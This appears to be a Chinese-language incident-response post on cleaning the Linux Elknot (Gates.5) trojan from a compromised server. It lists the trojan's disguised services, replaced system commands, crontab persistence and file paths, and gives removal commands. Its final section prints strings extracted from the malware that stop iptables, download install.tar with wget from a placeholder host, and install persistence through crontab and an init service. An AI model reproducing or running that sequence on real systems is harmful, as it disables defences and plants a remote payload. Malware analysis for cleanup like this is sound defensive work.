Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理

Linux服务器被黑， 向外疯狂发包，造成网络瘫痪，
可用clamAV扫描， 显示是Linux Unix.Trojan.Elknot木马病毒（Linux.BackDoor.Gates.5），

参考：

http://bbs.appstar.com.cn/thread-10205-1-1.html

http://news.drweb.cn/show/?i=230&lng=cn&c=5

这个木马，伪装和自我保能力很强，要想彻底清除必须要认识到该木马病毒的特性

1、关闭防火墙

2、伪装系统服务

3、伪装系统命令

4、定时自动启动

认识到这些后采取相应的在动作

1、关闭防活墙

该木马病毒会自动关闭防火墙iptables，可把iptables更改服务名称

mv /etc/init.d/iptables iptables2

2、伪装系统服务 

伪装的系统服务有

DbSecuritySpt
selinux
taskgrm-

可先把这些服务停止，

service taskgrm- stop

chkconfig --del  taskgrm-

rm /etc/init.d/taskgrm-

...

3、伪装系统命令

   伪装的系统命令有：

ps
netstat
lsof
bsd-port

要把这些文件删除掉，从别的系统里再copy过来

4、定时自动启动

    木马病毒是修改了/etc/crontab文件

木最后还需要清除木马病毒文件及进程

/bin/install.rar

/root/xl123
/bin/socket
/bin/install.tar
/bin/.sshd

cnet2
mysql515
socket
taskgrm-
xl123

我是通过对install.rar的分析来弄清楚这个木马病毒的，

解压install.rar，里面的文件都是病毒文件，

用vim 打开mysql515从其中的一些片断可弄清该病毒是如何工作的

 ^@service iptables stop^
 @/bin/install.tar^@wget -c -P /bin http://%s/install.tar^@^@^
 @tar -xf /bin/install.tar -C /bin/^@%s/xl123^@/root/xl123^@chmod 0777
 /bin/mysql515^@chmod 0777 /bin/socket^@chmod 0777 /bin/cnet2^@chmod 0755
 /root/xl123^@rm -rf /root/xl123h /usr/bin/%s^@nohup /bin/socket > /dev/null 2>&1
 
  &^@/bin/rc.local^@%s/rc.local^@/etc/rc.local^@%s/crontab^@/etc/crontab^@%s/%s^@a^@cd %s
chmod 777 %s/%s
./%s^@chmod 777 %s/%s^@a+^@*/55 * * * * root %s/%s
^@/etc/init.d/taskgrm-
^@/bin/taskgrm-
^@^@^@chmod 777 /etc/init.d/taskgrm-
^@^@ln -s /etc/init.d/taskgrm- /etc/rc.d/rc5.d/taskgrm-
^@chmod 777 /etc/rc.d/rc5.d/taskgrm-
^@chkconfig --add taskgrm-^@mysql515^@/bin^@cngamemafix.sh^@r^@the file1 can not open %s
^@w^@^@^@^@the new file can not open %s

其中有关闭防火墙壁， 下载病毒程序install.tar，添加自启动服务，定进运行等，

通过这些线索可帮助我们去清理该病毒